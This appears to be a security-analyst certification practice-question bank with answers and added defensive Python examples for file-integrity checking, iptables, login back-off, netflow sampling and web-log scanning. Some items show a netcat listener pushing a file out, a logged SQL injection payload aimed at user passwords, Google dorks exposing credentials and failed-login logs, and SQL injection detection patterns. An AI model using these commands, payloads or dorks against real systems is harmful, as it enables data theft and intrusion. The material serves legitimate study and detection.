B. Since Cassandra is scanning a wireless network and the system is using an IP address that is commonly used for commodity wireless routers, her best guess should be that this is a wireless router that can be accessed via ssh and that is providing a web management interface and print services. The OS fingerprinting that nmap provides is not always reliable, and the VirtualBox match is a false positive in this case. The actual host scanned is an Asus router running open source firmware and additional software.
86. Charles needs to make sure he has found the correct social media profile for a target of his OSINT process. Which of the following includes the three critical items needed to uniquely identify the majority of Americans? A. Height, weight, and eye color B. Date of birth, gender, and zip code C. Zodiac sign, gender, and zip code D. Age, height, and weight
B. Latanya Sweeney's 2000 study of U.S. Census data showed that 87 percent of the U.S. population can be uniquely identified by their date of birth, gender, and five-digit ZIP code. If Charles can obtain this information, he has a very high chance of identifying the right individual.
87. While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command: nc -l -p 43501 < example.zip What happened? A. The user set up a reverse shell running as example.zip. B. The user set up netcat as a listener to push example.zip. C. The user set up a remote shell running as example.zip. D. The user set up netcat to receive example.zip.
B. The -l flag is a key hint here, indicating that netcat was set up as a listener. Any connection to port 43501 will result in example.zip being sent to the connecting application. Typically, a malicious user would then connect to that port using netcat from a remote system to download the file.
21. Alice is conducting a penetration test of a client's systems. As part of her test, she gathers information from the social media feeds of staff members who work for her client. What phase of the NIST penetration testing process is she currently in? A. Social engineering B. Discovery C. Analysis D. Social media profiling
B. The NIST SP 800-115 guide describes four penetration testing phases: planning, discovery, attack, and reporting. Alice is conducting a discovery activity. During this phase, she might also scan systems and networks, perform passive intelligence gathering, or use tools to gather additional information about her target.
19. As a U.S. government employee, Michael is required to ensure that the network devices that he procures have a verified chain of custody for every chip and component that goes into them. What is this program known as? A. Gray market procurement B. Trusted Foundry C. White market procurement D. Chain of Procurement
B. The U.S. DoD Trusted Foundry program works to assure the integrity and confidentiality of integrated circuit design and manufacturing. This helps to ensure that agents of foreign governments are not able to insert flaws or code into the ICs that could be leveraged for intelligence or cyberwarfare activities.
54. Selah has been tasked with gathering information to increase her penetration testing team's understanding of their customer's Internet footprint. She wants to gather details of emails, subdomains, employee names, and other information in an automated way. Which of the following tools is best suited to her needs? A. nmap B. theHarvester C. Shodan D. osint-ng
B. The best option in this list for Selah's purposes is theHarvester. It combines search engine-based searches with Shodan and other data sources to gather email addresses, subdomain information, employee names, and a variety of other types of useful footprinting data. Nmap is useful for port scanning but typically won't find email addresses and employee names, Shodan is a search engine for Internet-connected devices and their banners rather than a footprinting aggregator, and osint-ng is a made-up tool name.
27. Lauren has local access to a Windows workstation and wants to gather information about the organization that it belongs to. What type of information can she gain if she executes the command nbtstat -c? A. MAC addresses and IP addresses of local systems B. NetBIOS name-to-IP address mappings C. A list of all NetBIOS systems that the host is connected to D. NetBIOS MAC-to-IP address mappings
B. The command nbtstat -c shows the contents of the NetBIOS name cache and shows a list of name-to-IP address mappings.
79. In his role as the SOC operator, Frank regularly scans a variety of servers in his organization. After two months of reporting multiple vulnerabilities on a Windows file server, Frank recently escalated the issue to the server administrator's manager. At the next weekly scan window, Frank noticed that all of the vulnerabilities were no longer active; however, ports 137, 139, and 445 were still showing as open. What most likely happened? A. The server administrator blocked the scanner with a firewall. B. The server was patched. C. The vulnerability plug-ins were updated and no longer report false positives. D. The system was offline.
B. The system is showing normal ports for a Windows file server. It is most likely that Frank's escalation to management resulted in action by the server administrator.
99. Which of the three key objectives of cybersecurity is often ensured by using techniques like hashing and the use of tools like Tripwire? A. Confidentiality B. Integrity C. Identification D. Availability
B. The three objectives of cybersecurity are confidentiality, integrity, and availability. Hashing and the use of integrity monitoring tools like Tripwire are both techniques used to preserve integrity; in fact, file integrity monitoring tools typically use hashing to verify that files remain intact and unchanged.
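This is what Tripwire-style file integrity monitoring does in miniature, and it is the same mechanism question 53 asks about. The following added example (not from the original book, and not Tripwire's code) baselines a file's SHA-256 hash together with the size, permissions and modification time, then detects a same-size edit even after the attacker resets the mtime. The sample file and its contents are constructed.

```python
import hashlib
import json
import os
import tempfile

def sha256_file(path, chunk=65536):
    """Hash a file in chunks so large files do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def build_baseline(paths):
    """Record the hash plus the attributes Tripwire-style tools also watch (size, mode, mtime)."""
    baseline = {}
    for p in paths:
        st = os.stat(p)
        baseline[p] = {"sha256": sha256_file(p), "size": st.st_size,
                       "mode": st.st_mode, "mtime_ns": st.st_mtime_ns}
    return baseline

def verify(baseline):
    """Compare each file's current state with the baseline. Returns {path: [what changed]}."""
    report = {}
    for p, expected in baseline.items():
        if not os.path.exists(p):
            report[p] = ["missing"]
            continue
        st = os.stat(p)
        changes = []
        if sha256_file(p) != expected["sha256"]:
            changes.append("content")
        if st.st_size != expected["size"]:
            changes.append("size")
        if st.st_mode != expected["mode"]:
            changes.append("mode")
        if st.st_mtime_ns != expected["mtime_ns"]:
            changes.append("mtime")
        if changes:
            report[p] = changes
    return report

def demo():
    """Baseline a constructed config file, tamper with it, and verify twice.

    Returns (report_before_tampering, report_after_tampering)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "sshd_config")
        with open(path, "w") as f:
            f.write("MaxAuthTries 6\n")
        baseline = build_baseline([path])
        # In production the baseline lives off-host or read-only so an attacker cannot rewrite it too.
        saved = json.dumps(baseline)
        before = verify(json.loads(saved))
        with open(path, "w") as f:
            f.write("MaxAuthTries 9\n")            # same length, so size alone would not catch it
        ns = baseline[path]["mtime_ns"]
        os.utime(path, ns=(ns, ns))                # attacker resets the timestamp to hide the edit
        after = verify(json.loads(saved))
        return before, after

if __name__ == "__main__":
    print(demo())
```

A script that only re-hashes on a schedule (option A in question 53) catches the same content change; what Tripwire adds is a protected baseline, coverage of attributes such as ownership and permissions, and reporting, which is why a dedicated tool is the better answer for routine monitoring.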
9. Cameron needs to set up a Linux iptables-based firewall ruleset to prevent access from hosts A and B, while allowing SMTP traffic from host C. Which set of the following commands will accomplish this? IMAGE HERE
A. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP
# iptables -I INPUT 2 -s 10.2.0.0/24 -p tcp --dport 25 -j DROP
# iptables -I INPUT 2 -s 10.2.0.130 -p tcp --dport 25 -j ACCEPT
B. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP
# iptables -I INPUT 2 -s 10.2.0.134 -j DROP
# iptables -I INPUT 2 -s 10.2.0.130 -p tcp --dport 25 -j ACCEPT
C. # iptables -I INPUT 2 -s 10.1.1.170 -j ACCEPT
# iptables -I INPUT 2 -s 10.2.0.134 -j ACCEPT
# iptables -I INPUT 2 -s 10.2.0.130 -p tcp --dport 25 -j DROP
D. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP
# iptables -I INPUT 2 -s 10.2.0.134 -j DROP
# iptables -I INPUT 2 -s 10.2.0.130 -j ACCEPT
B. These commands insert rules into the INPUT chain that drop all traffic from hosts A and B and explicitly accept TCP port 25 (SMTP) from host C. Option D might appear attractive, but it accepts all traffic from host C instead of only SMTP. Option A only drops SMTP traffic from host B (and from every other host in its /24 segment), while Option C accepts traffic from the hosts you want to block! Note that the target is ACCEPT (iptables has no ALLOW target), --dport is only valid together with -p tcp or -p udp, and whether non-SMTP traffic from host C is blocked depends on the chain's default policy and the rules that follow.
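Because iptables semantics (first matching rule wins, otherwise the chain policy applies) decide which option is right, here is an added example (not from the original book) that models a chain and evaluates sample packets against Cameron's rules from question 9 and Geoff's DROP policies from question 43. The pre-existing rule 1, host B's address read as 10.2.0.134 from the option text, and the sample packets are assumptions.

```python
from ipaddress import ip_address, ip_network

class Rule:
    """One iptables rule: optional source, protocol and destination-port match, plus a target."""
    def __init__(self, target, src=None, proto=None, dport=None):
        self.target, self.src, self.proto, self.dport = target, src, proto, dport

    def matches(self, pkt):
        if self.src and ip_address(pkt["src"]) not in ip_network(self.src, strict=False):
            return False
        if self.proto and pkt.get("proto") != self.proto:
            return False
        if self.dport is not None and pkt.get("dport") != self.dport:
            return False
        return True

class Chain:
    """A built-in chain: rules are tried top to bottom, first match wins, otherwise the policy applies."""
    def __init__(self, policy="ACCEPT"):
        self.policy, self.rules = policy, []

    def set_policy(self, policy):            # iptables -P CHAIN policy
        self.policy = policy

    def insert(self, position, rule):        # iptables -I CHAIN position ...  (1-based)
        self.rules.insert(position - 1, rule)

    def verdict(self, pkt):
        for rule in self.rules:
            if rule.matches(pkt):
                return rule.target
        return self.policy

def cameron_input_chain():
    """Question 9, option B, with ACCEPT as the target and -p tcp so --dport is legal.

    Rule 1 is a constructed pre-existing rule, which is why the question inserts at position 2;
    the distribution default policy of ACCEPT is assumed."""
    chain = Chain(policy="ACCEPT")
    chain.insert(1, Rule("ACCEPT", src="127.0.0.1"))
    chain.insert(2, Rule("DROP", src="10.1.1.170"))                           # host A
    chain.insert(2, Rule("DROP", src="10.2.0.134"))                           # host B
    chain.insert(2, Rule("ACCEPT", src="10.2.0.130", proto="tcp", dport=25))  # host C, SMTP only
    return chain

def geoff_chains():
    """Question 43: the policy on all three built-in chains set to DROP."""
    chains = {name: Chain() for name in ("INPUT", "OUTPUT", "FORWARD")}
    for chain in chains.values():
        chain.set_policy("DROP")
    return chains

if __name__ == "__main__":
    c = cameron_input_chain()
    for pkt in ({"src": "10.1.1.170", "proto": "tcp", "dport": 22},
                {"src": "10.2.0.134", "proto": "tcp", "dport": 25},
                {"src": "10.2.0.130", "proto": "tcp", "dport": 25},
                {"src": "10.2.0.130", "proto": "tcp", "dport": 80}):
        print(pkt, "->", c.verdict(pkt))
```

Two things the model makes visible: inserting three rules at position 2 leaves them in reverse order (the last inserted sits highest), which is harmless here because the sources do not overlap, and with the default ACCEPT policy host C can still reach ports other than 25, so "only SMTP from host C" is true only once the policy is DROP or a later rule blocks the rest.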
18. Rick is auditing a Cisco router configuration and notes the following line: login block-for 120 attempts 5 within 60 What type of setting has been enabled? A. A DDoS prevention setting B. A back-off setting C. A telnet security setting D. An autologin prevention setting
B. This setting blocks all logins for 120 seconds when five failed attempts occur within 60 seconds. This can slow down brute-force login attempts, but Rick should recommend that the organization consider properly isolating the administrative interfaces on a protected network segment, if it has not already done so, rather than relying on a back-off algorithm alone.
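The following added example (not from the book) models the behaviour of that setting so the effect of the 60-second window and the 120-second quiet period can be traced for a given sequence of failed logins. The class name and the timing inputs are constructed; exact Cisco window-boundary semantics are not reproduced, only the documented idea of "N failures within W seconds triggers a B-second block".

```python
from collections import deque
from typing import Deque, Iterable, Optional


class LoginGuard:
    """Model of 'login block-for <B> attempts <A> within <W>'.

    After A failed logins inside any W-second window, refuse all logins for
    B seconds. Times are seconds supplied by the caller so runs are deterministic.
    """

    def __init__(self, block_for: int = 120, attempts: int = 5, within: int = 60):
        self.block_for = block_for
        self.attempts = attempts
        self.within = within
        self.failures: Deque[float] = deque()   # timestamps of recent failures
        self.quiet_until = 0.0                  # end of the current block, if any

    def allowed(self, now: float) -> bool:
        """True when a login attempt would be accepted for evaluation."""
        return now >= self.quiet_until

    def record_failure(self, now: float) -> bool:
        """Register a failed login; return True if quiet mode was just entered."""
        if not self.allowed(now):
            return False                         # still blocked, attempt rejected outright
        self.failures.append(now)
        # forget failures that have aged out of the window
        while self.failures and now - self.failures[0] > self.within:
            self.failures.popleft()
        if len(self.failures) >= self.attempts:
            self.quiet_until = now + self.block_for
            self.failures.clear()
            return True
        return False


def first_quiet_time(failure_times: Iterable[float], **settings) -> Optional[float]:
    """Replay a constructed sequence of failure timestamps; return when the block starts."""
    guard = LoginGuard(**settings)
    for t in failure_times:
        if guard.record_failure(t):
            return t
    return None


if __name__ == "__main__":
    # constructed scenarios: a burst of five failures, and a slow one every 20 seconds
    print("burst blocks at:", first_quiet_time([0, 5, 10, 15, 20]))
    print("slow attempts block at:", first_quiet_time([0, 20, 40, 60, 80, 100]))
```

The second scenario is the limitation Rick's recommendation addresses: failures spaced just wide enough never accumulate five inside the 60-second window, so the back-off never triggers and network isolation of the management interface is still needed.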
91. While reviewing email logs for his domain's email server, Rick notices that a single remote host is sending email to usernames that appear to be in alphabetical order: [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] ... This behavior continues for thousands of entries, resulting in many bounced email messages, but some make it through. What type of reconnaissance has Rick encountered? A. Brute force B. Domain harvesting C. Domain probe D. Email list builder
B. This type of probe is known as domain harvesting and relies on message rejection error messages to help the individual running the probe to determine which email accounts actually exist. Rick may want to disable delivery receipts, disable nondeliverable responses, or investigate more advanced techniques like false nondeliverable responses or recipient filtering and tar pitting.
53. Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this? A. Use sha1sum to generate a hash for the file and write a script to check it periodically. B. Install and use Tripwire. C. Periodically check the MAC information for the file using a script. D. Encrypt the file and keep the key secret so the file cannot be modified.
B. Tripwire and similar programs are designed to monitor a file for changes and to report on changes that occur. They rely on file fingerprints (hashes) and are designed to be reliable and scalable. Kathleen's best bet is to use a tool designed for the job, rather than to try to write her own.
10. After filling out the scoping document for a penetration test, including details of what tools, techniques, and targets are included in the test, what is the next step that Jessica needs to take to conduct the test? A. Port scan the target systems. B. Get sign-off on the document. C. Begin passive fingerprinting. D. Notify local law enforcement.
B. While it may be tempting to start immediately after finishing scoping, Jessica's next step should be to ensure that she has appropriate sign-off and agreement to the scope, timing, and effort involved in the test.
77. Lauren is contacted by a concerned administrator who notes that almost all of their Windows 10 Enterprise workstations are reporting the following issue after a patch deployment. What important policy may be missing? IMAGE HERE A. Active hours B. Required reboots C. Automatic updates D. Network time synchronization
B. Windows 10 has quite a few built-in options for reboots after patches, but if users are logged in and a forced restart is not set via Group Policy, patches may not be installed for a very long time. Lauren should work with system administrators and user groups to ensure that a reasonable reboot policy can be put into place.
85. What two pieces of information does nmap need to estimate network path distance? A. IP address and TTL B. TTL and operating system C. Operating system and BGP flags D. TCP flags and IP address
B. nmap can combine operating system identification and time to live to take a reasonable guess at the number of hops in the network path between the scanner and a remote system. The operating system guess will provide the base time to live, and the TTL counter will decrement at each hop. Given these two pieces of information, nmap takes an educated but often very accurate guess.
32. Alex wants to scan a protected network and has gained access to a system that can communicate to both his scanning system and the internal network, as shown in the image here. What type of nmap scan should Alex conduct to leverage this host if he cannot install nmap on system A? IMAGE HERE A. A reflection scan B. A proxy scan C. A randomized host scan D. A ping-through scan
B. nmap supports the use of both HTTP and SOCKS4 proxies, allowing Alex to configure the remote host as an HTTP proxy and bounce his scans through it. This can allow nmap users to leverage their scanning tools without installing them on a protected host or network.
36. Alex has been asked to assess the likelihood of reconnaissance activities against her organization (a small, regional business). Her first assignment is to determine the likelihood of port scans against systems in her organization's DMZ. How should she rate the likelihood of this occurring? A. Low B. Medium C. High D. There is not enough information for Alex to provide a rating.
C. Alex knows that systems that are exposed to the Internet like DMZ systems are constantly being scanned. She should rate the likelihood of the scan occurring as high. In fact, there is a good chance that a scan will be occurring while she is typing up her report!
83. While reviewing web server logs, Danielle notices the following entry. What occurred? 10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200 A. A theme was changed. B. A file was not found. C. There was an attempt to edit the 404 page. D. The 404 page was displayed.
C. Attackers often use built-in editing tools that are inadvertently or purposefully exposed to edit files to inject malicious code. In this case, someone has attempted to modify the 404 file displayed by WordPress. Anybody who received a 404 error from this installation could have been exposed to malicious code inserted into the 404 page or simply a defaced 404 page.
37. Lucy is the SOC operator for her organization and is responsible for monitoring her organization's SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently. While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization's New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time? A. Heuristic B. Behavior C. Availability D. Anomaly
C. Availability analysis targets whether a system or service is working as expected. While a SIEM may not have direct availability analysis capabilities, reporting on when logs and other data are not received from source systems can help detect outages. Ideally, Lucy's organization should be using a system monitoring tool that can alarm on availability issues as well as common system problems such as excessive memory, network, disk, or CPU usage.
22. What is the default nmap scan type when nmap is not provided with a scan type flag? A. A TCP FIN scan B. A TCP connect scan C. A TCP SYN scan D. A UDP scan
C. By default, nmap uses a TCP SYN scan. If the user does not have the privileges needed to send raw packets (such as root on a Linux system), it falls back to a TCP connect scan.
1. Charles wants to use active discovery techniques as part of his reconnaissance efforts. Which of the following techniques fits his criteria? A. Google searching B. Using a Shodan search C. Using DNS reverse lookup D. Querying a PGP key server
C. DNS reverse lookup is an active technique. Google and Shodan are both search engines, while a PGP key server does not interact with the target site and is considered passive reconnaissance. If you're not immediately familiar with a technique or technology, you can often narrow the possible options. Here, a Google search and a PGP key server query are obviously not active techniques and can be ruled out, and Shodan describes itself as a search, making a DNS reverse lookup a good guess even if you're not familiar with it.
15. Lauren's honeynet, shown here, is configured to use a segment of unused network space that has no legitimate servers in it. What type of threats is this design particularly useful for detecting? IMAGE HERE A. Zero-day attacks B. SQL injection C. Network scans D. DDoS attacks
C. Detection systems placed in otherwise unused network space will detect scans that blindly traverse IP ranges. Since no public services are listed, attackers who scan this range can be presumed to be hostile and are often immediately blocked by security devices that protect production systems.
13. What term is often used for attackers during a penetration test? A. Black team B. Blue team C. Red team D. Green team
C. During penetration tests, red teams are attackers, blue teams are defenders, and the white team establishes the rules of engagement and performance metrics for the test.
12. Chris wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use ssh? A. Add an iptables rule blocking root logins. B. Add root to the sudoers group. C. Change sshd_config to deny root login. D. Add a network IPS rule to block root logins.
C. Fortunately, the sshd service has a configuration setting called PermitRootLogin. Setting it to no will accomplish Chris's goal.
50. Lauren wants to use an advanced Google query to search for information that is not readily available as part of her reconnaissance efforts. What term is commonly used to describe these searches? A. Google whacks B. SuperGoogles C. Google dorks D. Google gizmos
C. Google dorks are advanced search strings that can help locate information that is otherwise difficult to find. They can be used to find things like SQL injection, login pages, links, domain-specific information, and a host of other data.
59. nmap provides a standardized way to name hardware and software that it detects. What is this called? A. CVE B. HardwareEnum C. CPE D. GearScript
C. nmap's Common Platform Enumeration is a standardized way to name applications, operating systems, and hardware. CPE output starts with cpe:/a for applications, /h for hardware, and /o for operating systems.
81. Adam is reviewing his organization's security footprint by conducting reconnaissance activities. After reviewing a list of Google dorks, he runs the following search: "mysqli_connect" ext:inc If it returns data, what should he recommend in his report to management? A. Block MySQL connections from remote hosts. B. Initiate the organization's incident response process. C. Immediately change MySQL passwords and review configurations. D. Change all MySQL connection strings.
C. If this Google search returns information, it will show MySQL connection information, including passwords. Adam should immediately report this finding to management and recommend that all exposed passwords be changed immediately, that the misconfiguration that exposed the files be fixed, and that the reason it occurred be identified. This does not tell you whether MySQL services are exposed remotely, and it does not mean that an incident has already occurred. At this point, Adam only knows that a misconfiguration has occurred. Changing all of the connection strings won't fix the root issue.
40. During his analysis of a malware sample, John reviews the malware files and binaries without running them. What type of analysis is this? A. Automated analysis B. Dynamic analysis C. Static analysis D. Heuristic analysis
C. John is performing static analysis, which is analysis performed without running code. He can use tools or manually review the code (and, in fact, is likely to do both).
Use the following network diagram and scenario to answer the next three questions: IMAGE HERE Lauren is a security analyst who has been tasked with performing nmap scans of her organization's network. She is a new hire and has been given this logical diagram of the organization's network but has not been provided with any additional detail. 95. If Lauren runs a scan from location B that targets the servers on the data center network and then runs a scan from location C, what differences is she most likely to see between the scans? A. The scans will match. B. Scans from location C will show no open ports. C. Scans from location C will show fewer open ports. D. Scans from location C will show more open ports.
C. Most data center firewalls are configured to only allow the ports for publicly accessible services through to other networks. Location C is on an internal network, so Lauren will probably see more ports than if she tried to scan data center systems from location A, but it is likely that she will see far fewer ports than a portscan of the data center from inside the data center firewall will show.
5. A port scan of a remote system shows that port 3306 is open on a remote database server. What database is the server most likely running? A. Oracle B. Postgres C. MySQL D. Microsoft SQL
C. MySQL uses port 3306 as its default port. Oracle uses 1521, Postgres uses 5432, and Microsoft SQL uses 1433/1434.
48. Adam knows that netcat is a useful penetration testing tool. Which of the following is not a way that he can use netcat, if he is using it as his only tool? A. File transfer B. Port scanner C. Encrypted shell D. Reverse shell
C. Netcat can act as a relay, file transfer tool, reverse shell, TCP banner grabber, TCP port scanner, and in a multitude of other roles, but it does not include encryption capabilities. If Adam needs to encrypt his data, he will need another tool to perform that task.
100. The netflow collector that Sam's security team uses is capable of handling 1 gigabit of traffic per second. As Sam's organization has grown, it has increased its external network connection to a 2 gigabit per second external link and has begun to approach full utilization at various times during the day. If Sam's team does not have new budget money to purchase a more capable collector, what option can Sam use to still collect useful data? A. Enable QoS B. Enable netflow compression C. Enable sampling D. None of the above
C. Random or deterministic sampling can help Sam's team capture usable flows despite not being able to handle the full throughput of their network. Random sampling will capture a random packet out of every n packets, with n set by the user. Deterministic sampling simply takes every nth packet that passes through, so Sam might sample the 1st, 11th, 21st, and so on. This means that small flows may be missed, but in this case, sampling half of all packets is still possible, meaning most flows will still be captured.
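The trade-off in that answer, that 1-in-n sampling keeps large flows measurable while single-packet flows can vanish, is easy to see on constructed data. The following added example (not from the book) implements both sampling modes over a made-up packet sequence in which one large flow is interleaved with two one-packet flows, and scales the sampled counts back up by n the way a collector would.

```python
import random
from collections import Counter
from typing import Dict, List, Sequence, Set

# Constructed traffic: flow "A" is a large transfer; "B" and "C" are single packets.
PACKETS: List[str] = ["A"] * 1000
PACKETS[1] = "B"   # an odd position: invisible to 1-in-2 deterministic sampling
PACKETS[4] = "C"   # an even position: captured by 1-in-2 deterministic sampling


def deterministic_sample(packets: Sequence[str], n: int) -> List[str]:
    """Keep every nth packet, starting with the first."""
    return [p for i, p in enumerate(packets) if i % n == 0]


def random_sample(packets: Sequence[str], n: int, seed: int = 0) -> List[str]:
    """Keep one randomly chosen packet out of each group of n."""
    rng = random.Random(seed)               # seeded so the demonstration is repeatable
    kept = []
    for start in range(0, len(packets), n):
        group = packets[start:start + n]
        kept.append(group[rng.randrange(len(group))])
    return kept


def flows_seen(sampled: Sequence[str]) -> Set[str]:
    """Distinct flow keys that survived sampling."""
    return set(sampled)


def estimate_volume(sampled: Sequence[str], n: int) -> Dict[str, int]:
    """Scale sampled per-flow packet counts back up by the sampling rate."""
    return {flow: count * n for flow, count in Counter(sampled).items()}


if __name__ == "__main__":
    det = deterministic_sample(PACKETS, 2)
    print("actual:", dict(Counter(PACKETS)))
    print("deterministic 1-in-2 sees:", flows_seen(det), "estimate:", estimate_volume(det, 2))
    rnd = random_sample(PACKETS, 2, seed=7)
    print("random 1-in-2 sees:", flows_seen(rnd), "estimate:", estimate_volume(rnd, 2))
```

The estimate for flow A (998 packets actual) comes out exactly right from the deterministic sample, while flow B is never seen; random sampling removes the systematic blind spot at odd positions but can still miss any given single-packet flow, so neither mode is a substitute for full collection when individual small flows matter.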
4. Charleen is preparing to conduct a scheduled reconnaissance effort against a client site. Which of the following is not typically part of the rules of engagement that are agreed to with a client for a reconnaissance effort? A. Timing B. Scope C. Exploitation methods D. Authorization
C. Reconnaissance efforts do not include exploitation, and Charleen should not expect to need to include exploitation limitations in the rules of engagement. If she was conducting a full penetration test, she would need to make sure she fully understands any concerns or limitations her client has about exploitation of vulnerabilities.
93. What major issue would Charles face if he relied on hashing malware packages to identify malware packages? A. Hashing can be spoofed. B. Collisions can result in false positives. C. Hashing cannot identify unknown malware.
C. Relying on hashing means that Charles will only be able to identify the specific versions of malware packages that have already been identified. This is a consistent problem with signature-based detections, and malware packages commonly implement polymorphic capabilities that mean that two instances of the same package will not have identical hashes because of changes meant to avoid signature-based detection systems.
3. Tiffany needs to assess the patch level of a Windows 2012 server and wants to use a freely available tool to check the system for security issues. Which of the following tools will provide the most detail about specific patches installed or missing from her machine? A. nmap B. Nessus C. MBSA D. Metasploit
C. The Microsoft Baseline Security Analyzer (MBSA) is a tool provided by Microsoft that can identify installed or missing patches as well as common security misconfigurations. Since it is run with administrative rights, it will provide a better view than normal nmap and Nessus scans and provides more detailed information about specific patches that are installed. Metasploit provides some limited scanning capabilities but is not the best tool for the situation.
11. Brian's penetration testing efforts have resulted in him successfully gaining access to a target system. Using the diagram shown here, identify what step occurs at point B in the NIST SP800-115 process flow. IMAGE HERE A. Vulnerability scanning B. Discovery C. Escalating privileges D. Pivoting
C. The NIST process focuses on escalating privileges before browsing the system. If Brian was fortunate enough to compromise an administrative account remotely, he could skip this step, but in most cases, his next step is to find a local exploit or privilege escalation flaw that will allow him to have more control over the system.
28. Tracy believes that a historic version of her target's website may contain data she needs for her reconnaissance. What tool can she use to review snapshots of the website from multiple points in time? A. Time Machine B. Morlock C. Wayback Machine D. Her target's web cache
C. The Wayback Machine and similar sites capture periodic snapshots of websites from across the Internet, allowing penetration testers and others performing reconnaissance activities to gather information from historic versions of their target sites. This also means that long-term data breaches may be archived in sites like these in addition to search engine caches.
26. While reviewing Shodan scan data for his organization, John notices the following entry. Which of the following is false? IMAGE HERE A. The device allows telnet connections. B. There is a console port on a nonstandard port. C. The device requires sshv1. D. The device is an automated tank gauge.
C. The device allows a telnet connection to port 10001 and identifies itself as an automated tank gauge. John should recommend disabling telnet or protecting the device with a firewall or other security device to prevent unauthorized remote access.
90. As part of his reconnaissance effort, Charles uses the following Google search string: "authentication failure; logname=" ext:log;site:example.com What will he find if he receives results from his target's domain? A. A list of successful logins B. A list of log names C. A list of failed logins D. A list of log files
C. This Google dork relies on log files being inadvertently exposed for a site. If the authentication logs are exposed, this will show lists of failed logins, along with login paths, possibly providing Charles with a useful list of usernames. He can then leverage that list by attempting logins, by gathering further information on the users, or by using social engineering.
17. Fred believes that the malware he is tracking uses a fast flux DNS network, which associates many IP addresses with a single fully qualified domain name as well as using multiple download hosts. How many distinct hosts should he review based on the netflow shown here? IMAGE HERE A. 1 B. 3 C. 4 D. 5
C. This flow sample shows four distinct hosts being accessed from 192.168.2.1. They are 10.2.3.1, 10.6.2.4, 10.6.2.5, and 10.8.2.5.
98. Alex has been asked to investigate a call to one of his organization's system administrators that is believed to have led to a breach. The administrator described that call by saying that the caller identified themselves as the assistant to the director of sales and said that they needed access to a file that was critical to a sales presentation with a major client but that their laptop had died. The administrator provided a link to the file, which included the organization's sales data for the quarter. What type of social engineering occurred? A. Baiting B. Quid pro quo C. Pretexting D. Whaling
C. This is an example of pretexting, which relies on creating a scenario that the victim will believe, resulting in the attacker gaining access. Baiting uses an item or something that the user desires to cause them to fall for a phishing style attack. Quid pro quo promises a benefit in exchange for information, and whaling is a phishing attack specifically aimed at important users.
84. While reviewing his Apache logs, Charles discovers the following entry. What has occurred? 10.1.1.1 - - [27/Jun/2017:11:42:22 -0500] "GET /query.php?searchterm=stuff&%20lid=1%20UNION%20SELECT%200,username,user_id,password,name,%20email,%20FROM%20users HTTP/1.1" 200 9918 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" A. A successful database query B. A PHP overflow attack C. A SQL injection attack D. An unsuccessful database query
C. This shows an attempted SQL injection attack. The query reads 1' UNION SELECT 0 and then looks for the username, user ID, password, and email from the users table.
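Both of the web log entries on this page (the WordPress theme-editor request in question 83 and the UNION SELECT request here) can be caught by the same review script: parse the Apache combined-format line, URL-decode the request target, and match it against a short set of patterns. The following added example (not from the book) does that over constructed log lines; the first sample line is adapted from the question, the other two are invented, and the pattern list is deliberately small.

```python
import re
from typing import Dict, Iterable, List
from urllib.parse import unquote

# Apache combined log format (constructed sample lines; the first mirrors the question).
SAMPLE_LINES = [
    '10.1.1.1 - - [27/Jun/2017:11:42:22 -0500] "GET /query.php?searchterm=stuff&%20lid=1%20UNION%20SELECT%200,username,user_id,password,name,%20email,%20FROM%20users HTTP/1.1" 200 9918 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"',
    '10.11.210.6 - - [27/Jun/2017:11:50:01 -0500] "GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme=total HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [27/Jun/2017:11:51:30 -0500] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)

# Patterns are applied to the URL-decoded request target, so %20 encoding does not hide them.
SQLI_RE = re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.IGNORECASE)
ADMIN_EDIT_RE = re.compile(r"/wp-admin/(?:theme-editor|plugin-editor)\.php", re.IGNORECASE)


def parse_line(line: str) -> Dict[str, str]:
    """Split one combined-format line into its fields; empty dict if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else {}


def classify(target: str) -> str:
    """Label a decoded request target, or return '' when nothing matches."""
    decoded = unquote(target)
    if SQLI_RE.search(decoded):
        return "sql-injection"
    if ADMIN_EDIT_RE.search(decoded):
        return "admin-file-edit"
    return ""


def scan_log(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return one finding per suspicious request, with the HTTP status the server returned."""
    findings = []
    for line in lines:
        fields = parse_line(line)
        if not fields:
            continue
        label = classify(fields["target"])
        if label:
            findings.append({
                "client": fields["client"],
                "finding": label,
                "status": int(fields["status"]),
                "decoded": unquote(fields["target"]),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LINES):
        print(f["client"], f["finding"], "status", f["status"])
```

The status code is kept on purpose: a 200 on either request, as in both questions, tells the reviewer the server processed the request rather than rejecting it, which is what turns a log line into something that needs follow-up on the application side.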
61. Alex wants to list all of the NetBIOS sessions open on a workstation. What command should he issue to do this? A. nbtstat -o B. nbtstat -r C. nbtstat -s D. nbtstat -c
